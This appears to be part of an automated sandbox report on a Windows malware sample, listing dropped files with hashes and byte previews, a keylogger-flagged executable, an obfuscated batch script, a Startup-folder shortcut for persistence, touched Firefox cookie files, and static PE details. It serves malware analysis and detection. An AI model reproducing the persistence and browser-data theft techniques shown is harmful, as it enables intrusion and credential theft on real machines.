Preview:	...CN..7...L.Y..........,.@F. .dT.....J...&}.:.&,.<..J2.m.sK...Nx....[y.&.2.,...i(.....m. ....D~.wg,...e..[LRgh'....,...i.."..h..g%..Be..,.:..k./h2.G....f;.[E.9\....TJ.a..{.....\...>w....o.eM.h&..6...A...!.......1(.y.f+[[......X.B.g...\F..N..._.7%.....f.U.v..#.=.........N.....=.R.O1.`..s..4P.%.}..s......4.C>...97.x...aa..d...}._..l.=;.(A.@0...G\|&../..:=.$.H~NB.Py5O..y....rLRW.]5...... .#g..b.....N...+.$.3....x..0o..%.>..7.'i.....c1l.........,k.......>..)$.q..A.z'].<.f.i..N..].&.,...P].Z...D.C.YwN....Bz.OJ.Qx........G....`"...A.RD.. .L./IC..S.h.$..F.g3........H.:.....z.>..+.........\|.:..vXy..HU.....^rWp.7.aX/..CDw.!.......o{Of..g\|.bd.:".oS....dC.Uu.(+T.........ogV./.?.OVE;.`..<A..d.v6;/{.\|\|./yg...jS..c.:...cTG.W.W.Ck..O"WF&..kfk\|7....r....r=>.Ze.......cP..Cuc..jK..]O.Wr`...]EP..$.d..u.........n..#b.........1....P...Y..2ZyG.:..{....._.S..U...e..&J..%3B.....#..8.E.E.4R..q.eg.Y<..........v......T3.........k........Pnj..KtI..a...L..

C:\Users\user\AppData\Local\Temp\Mario

Download File

Process:	C:\Users\user\AppData\Local\Temp\329C.exe
File Type:	data
Category:	dropped
Size (bytes):	101376
Entropy (8bit):	7.998182760343012
Encrypted:	true
SSDEEP:	3072:G8yOpKPMrb7bwYvV8HgVyqqxxkE5QouOFk6ryQffJu:XlKUDbwTgVoxkTolk6zZu
MD5:	F14869E805070A576FAE15EE1076866A
SHA1:	A51A4F2215D8502B969E84E6FAA4580A43E42EBF
SHA-256:	D4CF0CA9186326C500793C2D53A1EC1DA54D675B0EBC897965CB8A3D361BC98F
SHA-512:	E04617A8C041D3CD3336E33EC8EF491FB8578A8FD78B417F87C802BE8519352CEC15865834F383655319C8FC8ABBCC70A5F1FE7CAA0E9F796EB9F280F809FD50
Malicious:	false
Preview:	<..x.$.DEu.......n.h?4..+....-.(M.L....".J...k@.;n.,..Mjo!.-.{.....w._..tB`.U.;u..6.S?5..U.FH../..../z8.V.b..\|I.8.!.n.:.....c.ib?.....3[..fY.....'....U..b.<.o.TA.G..?o....m......(D..g......m...oFXA..nzg..YT...c...Se.?...w.........]..t.....rhG..}....U..Sp...J.....i.".FG..}n..,..+..........A..[.D........YU\|.j.Z.U..y.f.N....\|..z..B.(...l...2..\LN.....O...F....=?..r..-.....:[.,Q.lP..T{......'=r@....R.w@...U....w-.>..Z..mm...T...w...\w.^..2../...[....x.J......E.%..r...4.U.F.;.7.........v.'....u...j...........{...z..b....N..b.L.D.KA.=%......t(._P.5.j....s..h...8R.Dt....+..F<$E@......)...B...T.s:... '.~wn.u......0-.$y.<.(..Z..0..0.8..9.lEj..kVX..A.....(}.{p..-..7.bL...45.o.EPk........I.l.O5.....=.8.....d.[0t..~.......P...@.aS2+[......yVn7,.E..S"...W....u......g.$2..XtY......CZ?3h9..UG.e.d...\.E.Y....<,.B.cXo*..r.b..`.L.......w.0.=.. [..y.y.(..._..q....I..?..x.`..L:c.?......4.t$.0....+.$..w.e..O...C0,.._...?...A...&.?..ABc......+.#

C:\Users\user\AppData\Local\Temp\Postcards

Download File

Process:	C:\Users\user\AppData\Local\Temp\329C.exe
File Type:	data
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	7.998180124993425
Encrypted:	true
SSDEEP:	1536:1pO/OEAHeFxogka4SqY+HapeDsIH0Cl6lKQhBjilMKmf:1AxHFxogGFYNNIngKQz9Kw
MD5:	8108EEDE1174F1414FB30109698A6495
SHA1:	8718AB0B6CC67D3C18B1BE49EDD887BF00559A31
SHA-256:	10F1B18C8830206A8EE49C73457E6E55E27BEBD21E6EF38A009399C54BF12D55
SHA-512:	A30F570A8719CB78EED965BFE93BD5FE876E6A76382B701C81B13299419A49ADDC6E985246595E51D441FA010348EF00E05739DC26789A22CCEA228782F5105D
Malicious:	false
Preview:	..k6...(%0.B0..d.>....~.G.R.O.m:...3..M.(mU.B`..z.72.J..D.....c.........s.9.H..T..\v.&.b..v....~.[NY........h.G..2.....#Bs..\.v..M..1..%.^\|_co............6n.u.....:\|.JaQ......Cu...Z.........h..2.]-`...;.5..j..;9Y.@m{..$...l..b...?.... 1)..k(Sw.(....8a.p.W......X. ...r5....y...9..... k.Prjf..#....a.KD.P.b18\|.u5yv.&;.;.B.I.V....P/-R.!R.......P.........:{.].}..%..R......+..&l..6#y/..L.s..m......Z+...6->.D..q}..=.KKj.b..!..n..hY....X..2...J^u.!.YZ.z.{s^..'..A.).E.u...&.i...t.1...P#...9hY...c.-..e.yiW.o%)^....-..j;.x._.Y.e.^m......ax`...N.>.....x.Q.W...t.....O.S..r5..o.4.........K.........CC-.R..f....8..?....B...s..a....Q6.n...A...J....$.5..&#.&...m3....1=.g.X...........\|....k.]j..o..;....W.....y.....]/z..m.a[...P..?.6J.s.k0....%.e9..x.P.2.P...:...z...9......z.......F3Z..P...Y...&..'.O(K k..$....E=.G..........;.}.*G..E.k.....X...u....F....?...e_<&...;B.d......5.!E...E....o.{@.i-.n3../...7.0...Z'..u...n......[..[.uPZ.....=l..N...3.

C:\Users\user\AppData\Local\Temp\Shift

Download File

Process:	C:\Users\user\AppData\Local\Temp\329C.exe
File Type:	data
Category:	dropped
Size (bytes):	50425
Entropy (8bit):	7.996787914075402
Encrypted:	true
SSDEEP:	1536:cjQ4akillWKz1jpSGxv56h+GkTeP7yhl39:qaPGa18qskfyj259
MD5:	0141B2A8ABF63806C27D6BBEAC442E7F
SHA1:	6C33F8CEF6AA554959B15926A92FE0914C0843D2
SHA-256:	2B2F460C65A0859165342C8418091D54F4FF654A80754261F8ABE351B539E8FA
SHA-512:	36F1F0DA541CB67476833B72C277C094E880C1C9F888597479F3754B2900A86B0F445BB0B72DA77649BD121F1BA3CA8DF143AF15EB80F7952A9CCB79CB74DEC8
Malicious:	false
Preview:	..hR~i..).Z..M8(.H.......ta=..`...."....}ie"...F.8i~k..L....[.'.3.N........+..4..`#b-..N..@...Ql.j.A./...^&.gO-......1`..27f2a.W.p65e.%[.e?>.{.......r%{...^....nw..6ez.'.4.OFj/.AY.m........\&....W.Oo.{k:.].b1k...?O.H....z...u;j/........!...3.`..}&PE....X..p.i..5..xq..t<l.... ".<..yXg.u.D..P.vU.d....f..u@Zwi. 7;.Tj.L....5.H..m..6.-......w.\|o.5$..Q.%H.Gn....O.31....6.S-...P.b&U....O.....l.+.R@.w..wB.z)......,.7..\|2..^.E6....,....C.'...b..z>%s.^.R3....2.8k.NG....w../P......V.I.`...(..`....7zj.q...P1 ]..cA.z?PU.w.Y......`.......V.d..r..N..\|$.....l%.LJ..t.......+.n.p..H.R...R<..../..:YT.].:p.Fb.M...0P....\|V..m.>.y.#1.5.... ...._a....[..5.3(...'.7.@.p^..;.:a..3..9v.P.....?.......-z...H..[.Q.R{.c..K,.....]B?....6.cu@=&.G.f.D..y..l...Ni.n.Z..0.....q...q.,[>N..:.............#wd..AE..IyR4..)mPe...W.UD......B..A..Wu.Ac2t.. n...>.R~.9.......G{...U........!....^.&....V>.Z..&.......u.d'.......>C.m.O.,..q.....EM&l..Nc..>81{...W>.q.z.".>.'a.b.&...

C:\Users\user\AppData\Local\Temp\Teach

Download File

Process:	C:\Users\user\AppData\Local\Temp\329C.exe
File Type:	ASCII text, with very long lines (554), with CRLF line terminators
Category:	dropped
Size (bytes):	8630
Entropy (8bit):	5.062582393499307
Encrypted:	false
SSDEEP:	192:5GNhKwJh1x9cR1MyA8DPoGW8GDlp1wOSqITdBkp:5CpJhr9UN+nwOSr4
MD5:	172EBF95F8DF53C093B993981D129A9A
SHA1:	8E13E0C1E2B969F4A9395BA368165E3F11A95ACB
SHA-256:	5477AD04A7A942C69891AE624BEB1B0BC382760EF4ADEAAFBEF557EF173E266E
SHA-512:	F909B64F7E7C76A80E14E0D466A0BDAF4EBB387845B8DE44DD7702063999CA72884C285DD0501D178A680AAC096B69FD7CD50629E96D41E414093030FF3E9236
Malicious:	false
Preview:	Set Sn=V..ydAmAllocated Meant Native Intelligence Systems Recommendations ..mtpPupils Hl ..IRFdDeck Picking Olympus Gratis Insider ..mmMeant Pee Arrivals Heating Dust Geology Subtle Gross ..YjVolvo Loved Details Pension ..Set Systems=X..SxRAchieve Arrived Differ Tp Has ..igDelivering Julian Updating Images ..OvBp ..BGAlthough ..uzMortality Youth State Paintball Ladies R Chemistry ..awInitiatives Define Computation Programming Spies ..Set Compatible=s..QAtNeedle Remedies Buf Estimate Sunny Trek Agreement ..OwcCMating Nodes Work ..gtHalo Mississippi Person Allowing ..WjSMarch Metropolitan Cycles Keeps Defects Developer Theft Ge ..fusPresents ..QGvMotels Kidney Functionality ..vIaBeijing ..Set Benchmark=v..JppjConcord Automation Anne Employed Pulse ..QZYForever ..jlKADk Entire Cohen Anchor Serving Smaller Taught Cycling Shanghai ..vaCircles Studying Innovations Upgrade Outlet ..zZTMeets Lose Integrity Moderator Yourself Centers Statement Taylor ..vLTape Atmospheric Image Gone Deposits Cho

C:\Users\user\AppData\Local\Temp\Teach.bat (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (554), with CRLF line terminators
Category:	dropped
Size (bytes):	8630
Entropy (8bit):	5.062582393499307
Encrypted:	false
SSDEEP:	192:5GNhKwJh1x9cR1MyA8DPoGW8GDlp1wOSqITdBkp:5CpJhr9UN+nwOSr4
MD5:	172EBF95F8DF53C093B993981D129A9A
SHA1:	8E13E0C1E2B969F4A9395BA368165E3F11A95ACB
SHA-256:	5477AD04A7A942C69891AE624BEB1B0BC382760EF4ADEAAFBEF557EF173E266E
SHA-512:	F909B64F7E7C76A80E14E0D466A0BDAF4EBB387845B8DE44DD7702063999CA72884C285DD0501D178A680AAC096B69FD7CD50629E96D41E414093030FF3E9236
Malicious:	false
Preview:	Set Sn=V..ydAmAllocated Meant Native Intelligence Systems Recommendations ..mtpPupils Hl ..IRFdDeck Picking Olympus Gratis Insider ..mmMeant Pee Arrivals Heating Dust Geology Subtle Gross ..YjVolvo Loved Details Pension ..Set Systems=X..SxRAchieve Arrived Differ Tp Has ..igDelivering Julian Updating Images ..OvBp ..BGAlthough ..uzMortality Youth State Paintball Ladies R Chemistry ..awInitiatives Define Computation Programming Spies ..Set Compatible=s..QAtNeedle Remedies Buf Estimate Sunny Trek Agreement ..OwcCMating Nodes Work ..gtHalo Mississippi Person Allowing ..WjSMarch Metropolitan Cycles Keeps Defects Developer Theft Ge ..fusPresents ..QGvMotels Kidney Functionality ..vIaBeijing ..Set Benchmark=v..JppjConcord Automation Anne Employed Pulse ..QZYForever ..jlKADk Entire Cohen Anchor Serving Smaller Taught Cycling Shanghai ..vaCircles Studying Innovations Upgrade Outlet ..zZTMeets Lose Integrity Moderator Yourself Centers Statement Taylor ..vLTape Atmospheric Image Gone Deposits Cho

C:\Users\user\AppData\Local\Temp\Vessel

Download File

Process:	C:\Users\user\AppData\Local\Temp\329C.exe
File Type:	data
Category:	dropped
Size (bytes):	54272
Entropy (8bit):	7.996071271061608
Encrypted:	true
SSDEEP:	1536:y/tQcSmWEwWQHDcS9fg/X5yljqURr8vFBs:4tfNWEwRIS9aEjq5js
MD5:	E18C3A6148B3D94B34B74E7BFF3781A9
SHA1:	C63A4B45430D268A0A950EDF276E6E79F3E33429
SHA-256:	4B262C7155534060ABE7AA04DCDEBC0196C0790A4E2E13128B31DEBDD0ABEC87
SHA-512:	E5AE24D21E8BA4A0F724E3AABC5A0ECC9CBA0FBD40B1B4FF9F41EFFEA50BACA4EA8EF7BD01DD62BBBB2CEE95D83F3C0DB9B889199F09DC4FBC950BE0CE2B897B
Malicious:	false
Preview:	'!m.3..%.N}\|......{t...A}U..\.^T.~g........-.g.a.....U.<...^.9...)....,u.X..W.....Rk...@..q.o.A..- ..KM8.......]U....<..z..,.,(.?....5.6.."%....(?v.....:..h.o._....n..T.3R..L.ps....E"/..-0..8..d..+.w....m..+.z +..V.....)..........vW.[...p...$..E....r.D.w.........."K.......cz..e.-.W.../.1......5..A".T.2....V.....f4.bj..RM....#-..R.FT.>..{}.xl=.....S...4...,.-Fs~.I..g..{....:kU.<.....d..^MEh......cckt..R.y.Pv.....j..EP.N..+...[v.$Yh.....z.\.$..'H.).1'c..$.(..p8...f.. ....Q.J..5)O....$TC..F..3.....d.s.....a..A.T~a.........Q.....g....X./lm.e.(..Q...d=l1.....9.X.G)...q..XO......".(.....}.........Yc.L....G..6.;........Y4...h4...?..z.q6.....T...`..E.q....$g5.Uk......7.5LU.=p.U.B....A.9b.W..x..K...]..8..\....F.V..R.{_ ..[.LqA.........D.!.. .6.w.c>.CmUf.s.nr...5.t.)........=..^...B..R......vZN...6...,..H.7@V.....[..."_Tj.%.4$;.&.OI..m.Mf....N..4..?....:.c..z?......./.W1hC5..i..+....%.H.....5&...q!.$.G...f+;>2A.o-...,\|A(,k>..-.A.\|GV.<.........

C:\Users\user\AppData\Local\Temp\Vhs

Download File

Process:	C:\Users\user\AppData\Local\Temp\329C.exe
File Type:	data
Category:	dropped
Size (bytes):	100352
Entropy (8bit):	7.998041590175811
Encrypted:	true
SSDEEP:	3072:b4Gj63h3QCB3AcBTU9MHgxfXG5qZ54M6hlxYk:Rj6xX3hTU9xf2sZ54PhD
MD5:	85927F85E72EABC24F99B40B65A3B1A0
SHA1:	7800D8910C3C3E919A95D93704D34F47D7F4CC85
SHA-256:	ECC0425495F2DCEAD846F032E5E912CF7C46FCDFE92801F34499107ADEBA4C33
SHA-512:	D9A691BEB78DAD51C6F2A56C00FDA51C82846F6C6891D348A994801DDA31E49CCB63EE99FF822CB826321363E1CA008DD110F64C6ED7554E56A6BF750138CF42
Malicious:	false
Preview:	&.\~b.....J\|.=...........]n..Hj....Q{.4.X....m....M....:.....,..8).UT.....Zz...@..6...-...5..!.\...O.9.......}....]`)+7.A........'.G......"...o;.CP."........E.a....#.....%'.X-.!.H.-.X.V.iB.....P..&@.0.....x7F.}F.c....,.q..ut.....$..K\uL...N..?......C...E..Q.^..&..0.X....pJ..d.$o....q..Yh.@#NR>...p.c9.P..5Mi=Y..pu..>..}..?x.$.mSv..1...h6?s9.>O...........K.(Kt...K..O..2.f.h%....".V.9\|.....^8..r..F.E&0.H..#.........#.C.....s.X........_M.3..Cr.u.-....9Sz9xh ..H..q.{.N..k.m.x.h.(.....G@.h.O....js{..W.So.Y[E.\|Mj..j..o.Qc..5....Q].......d....A...GQq.7..>.......)fg........!j....Zs.......h.g`.d..o7..9.w4.T.o..K.....&X...U.e<).....;c..o`m.tyz....v?x.8...>YH.J`.?R...I.,. f.....1;.5..y..q...........(u..6. hq./.M.).^..;@?.0w./.X..Z..`.=~I...S.ic4..C...._...[\|.a..'".K.NP... G..Q..^D.].5....~.k......k..\A.Xfl^...`S.f.=...G.E..pe.0X...Nydy.,....+I,...M].B.`....F..+!9...oJ]...a...]._k.y..c..E... ..;e.5.El.$+...h>1tp....~V+....%5_.........,=..e...

C:\Users\user\AppData\Local\Temp\Yahoo

Download File

Process:	C:\Users\user\AppData\Local\Temp\329C.exe
File Type:	data
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	7.997797774683399
Encrypted:	true
SSDEEP:	1536:bQxp7gXhPRcf4U3y8xVlpBpqHf5xHfskJPQdBYtvXcxjg1rh68eJMUgLYe1dkitk:WUhO33psbHfl4dBsXcZg19Xene1dkitk
MD5:	AD2A4D489DA5F85A7F57850D32A9D18B
SHA1:	DECFEDB9F07548FDBCA5CC14612DAB44B99EF572
SHA-256:	F917DE8959AED9A8D4F33BABA4284744AF5517CC4B57FCA3ADE9B9FF45EE34CC
SHA-512:	231930792C8FFF939C6C40F12215D0BBF364D0B3240592C788F36C5B9A83C59D40A9DFD9D569AD975D800A442037B7C0FD612D0B044E6955F7D32D85A8BC725D
Malicious:	false
Preview:	....hw...s.20....,$.o.....^......<.oc1Ou:L4.x.."...q.6M[u.u....e%.\Sg]S...B.."2.o/.%R.O.s........PM<..84.\.2k...l.U4[.E.T0.{.gt...u\|}.B].....{<..\#...7....lOc.(WN.x.ev......p5..f.5..AB.?....o..//..@....X...Q..V.5.P.<.;,.r....L..m...N..(9.#].F....-t..Jh]d..7.?vo7.:..J.E..)...;s...4...].'...CG.!"..M...~.X..n...u..8.$0W......hr...........$.D.Oc.meH....r..3.(.'...6.E...U......7z9..E...{..t.?.......x ..5..........\|..U...2....&....8bR7.......q.-x.iE .Z.....V./....B.V....GL......>.tA#..:.M\|..]..v..u..2&IO..Qt..].....~..dG1.....a.9....NU..L..Ckzy...ELO ...e.#m...X.....W."..8=Pn(Vg..b..w...Yz.-C.0.!...p..&.<..=.}.K........[].O.a.?.-&...r...U1.D%...... y......UG..@6u.l...d.2rh\|.~u.ax...0}...J.N....\.Fd.;.Fg..z....MC....N.(.0 ..."S.M8....Oz.d.^........r..J.^.......i.4.]g.tNqnl.?. .tU.;VN....;..2&.N].Bv....OweP..1..".$2..A....G..0.)..R.V}".]....).....x.!.R....j?.c........Q+o]..=..hA3......r.......p:8=*[.6.0..j...t.. ...J.P.Z....b.]$..

C:\Users\user\AppData\Local\Temp\svchost015.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\DFA6.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2990472
Entropy (8bit):	6.459856200541649
Encrypted:	false
SSDEEP:	49152:/INqIwJA7BYAzLOhHpB63X4oQaM35DhnSYf7bPZcYsO5+th1:wNqC7BZEHSQz5DhnSy7ujL
MD5:	B826DD92D78EA2526E465A34324EBEEA
SHA1:	BF8A0093ACFD2EB93C102E1A5745FB080575372E
SHA-256:	7824B50ACDD144764DAC7445A4067B35CF0FEF619E451045AB6C1F54F5653A5B
SHA-512:	1AC4B731B9B31CABF3B1C43AEE37206AEE5326C8E786ABE2AB38E031633B778F97F2D6545CF745C3066F3BD47B7AAF2DED2F9955475428100EAF271DD9AEEF17
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....\"f..................#.........l.#.......#...@..........................p1.....?.-...`...(..@...........................p&.l3....(...............-..!....................................&.....................................................CODE......#.......#................. ..`DATA....0.....#.......#.............@...BSS...........$......\$..................idata..l3...p&..4...\$.............@....tls....\|.....&.......$..................rdata........&.......$.............@..P.reloc.......&.......$.............@..P.rsrc.........(.......$.............@..P.............p1......,/.............@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.853902853135428
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYot+kiE2J52SMDaSEPNFy:HRYF5yjowkn232SM+Fy
MD5:	CA474E487BF7F203BB433EDA8D87A667
SHA1:	AF97DC73F17A90449C3DE1D0C4E0C5392D918E64
SHA-256:	0A2CC09434107CE2D67BB3930AC77926B578D6AD368FFEBF7A14722805BA4CE2
SHA-512:	5858E1972516CB049B9D3F73123B8C8A2413EA5377C30C9A569D80B9FE8D0C3EA4D0589B3B367FFCF639B9E57CD59B9E9CA76BAA3D43F0187871D2DCDDCD5964
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js" ..

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ewggbbh

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	413184
Entropy (8bit):	5.9686800358423895
Encrypted:	false
SSDEEP:	6144:lHansXZYIWhpZ9fRPINs35KM9JtzFreUw+qtR:lH4sXnKp76OsMvtzFr++
MD5:	FD192FB05E0CD219B14C5BF345F33CFB
SHA1:	FBADB3784B44770045F6C84F3CC2DB34E1B6863A
SHA-256:	0599250511B7B3EC63303FA14E98EDEF3092D61614E07106CF274BD6D43B2451
SHA-512:	5FDE7DC2658C6C472069CB8AA9A0D7171537F0A27ED087A154A992FDC53FFC1039AA8A0AEAEF3591367FBCA9DAE18FF810784C9D48D567807C85841DBA509A5E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........H.z...z...z.......z....!..z.......z....,..z...z...z.......z....%..z...."..z..Rich.z..................PE..L...G..d............................ZN............@..........................p.................................................P....@..."...........................................................5..@............................................text...v........................... ..`.data...(s.......x..................@....rsrc...."...@...$...*..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ewggbbh:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.9686800358423895
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	h8jGj6Qe78.exe
File size:	413'184 bytes
MD5:	fd192fb05e0cd219b14c5bf345f33cfb
SHA1:	fbadb3784b44770045f6c84f3cc2db34e1b6863a
SHA256:	0599250511b7b3ec63303fa14e98edef3092d61614e07106cf274bd6d43b2451
SHA512:	5fde7dc2658c6c472069cb8aa9a0d7171537f0a27ed087a154a992fdc53ffc1039aa8a0aeaef3591367fbca9dae18ff810784c9d48d567807c85841dba509a5e
SSDEEP:	6144:lHansXZYIWhpZ9fRPINs35KM9JtzFreUw+qtR:lH4sXnKp76OsMvtzFr++
TLSH:	7A94C013A2E1FC22E6665A319D6DC2F4E66EF9198F19737B32187F1F28701A1C572312
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........H.z...z...z.......z....!..z.......z....,..z...z...z.......z....%..z...."..z..Rich.z..................PE..L...G..d...........

File Icon


Icon Hash:	cd4d3d2e4e054d03

Static PE Info

General

Entrypoint:	0x404e5a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64F99E47 [Thu Sep 7 09:56:23 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	f11d3344d5447b8895a001459fe30f13

Entrypoint Preview

Instruction
call 00007F16587F1A92h
jmp 00007F16587EEDBEh
sub eax, 000003A4h
je 00007F16587EEF54h
sub eax, 04h
je 00007F16587EEF49h
sub eax, 0Dh
je 00007F16587EEF3Eh
dec eax
je 00007F16587EEF35h
xor eax, eax
ret
mov eax, 00000404h
ret
mov eax, 00000412h
ret
mov eax, 00000804h
ret
mov eax, 00000411h
ret
mov edi, edi
push esi
push edi
mov esi, eax
push 00000101h
xor edi, edi
lea eax, dword ptr [esi+1Ch]
push edi
push eax
call 00007F16587F1AEBh
xor eax, eax
movzx ecx, ax
mov eax, ecx
mov dword ptr [esi+04h], edi
mov dword ptr [esi+08h], edi
mov dword ptr [esi+0Ch], edi
shl ecx, 10h
or eax, ecx
lea edi, dword ptr [esi+10h]
stosd
stosd
stosd
mov ecx, 0043C028h
add esp, 0Ch
lea eax, dword ptr [esi+1Ch]
sub ecx, esi
mov edi, 00000101h
mov dl, byte ptr [ecx+eax]
mov byte ptr [eax], dl
inc eax
dec edi
jne 00007F16587EEF29h
lea eax, dword ptr [esi+0000011Dh]
mov esi, 00000100h
mov dl, byte ptr [eax+ecx]
mov byte ptr [eax], dl
inc eax
dec esi
jne 00007F16587EEF29h
pop edi
pop esi
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 0000051Ch
mov eax, dword ptr [0043CAC0h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
push edi
lea eax, dword ptr [ebp-00000518h]
push eax
push dword ptr [esi+04h]
call dword ptr [00401124h]
mov edi, 00000100h

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3b2cc	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1e4000	0x122d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b31c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3508	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1cc	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3ad76	0x3ae00	c54bdacb917f8bec7f100ebee02d7786	False	0.855530951433121	data	7.663050428364978	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x3c000	0x1a7328	0x17800	04f0311785096e82fa487c41f9b66e17	False	0.019707862367021278	data	0.2583095273079606	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1e4000	0x122d0	0x12400	c12d43145bcb1a92be80f06dcc927eb0	False	0.3540373501712329	data	4.523151603350592	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

